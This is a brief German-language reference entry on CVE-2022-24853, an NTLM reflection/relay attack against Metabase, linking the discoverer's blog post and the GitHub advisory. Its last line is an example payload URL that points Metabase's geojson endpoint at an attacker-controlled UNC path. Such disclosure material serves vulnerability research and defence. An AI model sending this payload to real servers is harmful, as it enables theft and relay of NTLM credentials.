
Metabase NTLM-Angriff
Metabase NTLM-Reflexions-/Relay-Angriff CVE-2022-24853
Blogbeitrag zum Fund: https://secure77.de/metabase-ntlm-relay-attack/
GitHub-Sicherheitshinweis: https://github.com/metabase/metabase/security/advisories/GHSA-5cfq-582c-c38m
http://metabase-target-server.com/api/geojson?url=jar:file:\<attacker-ip>\test.txt!/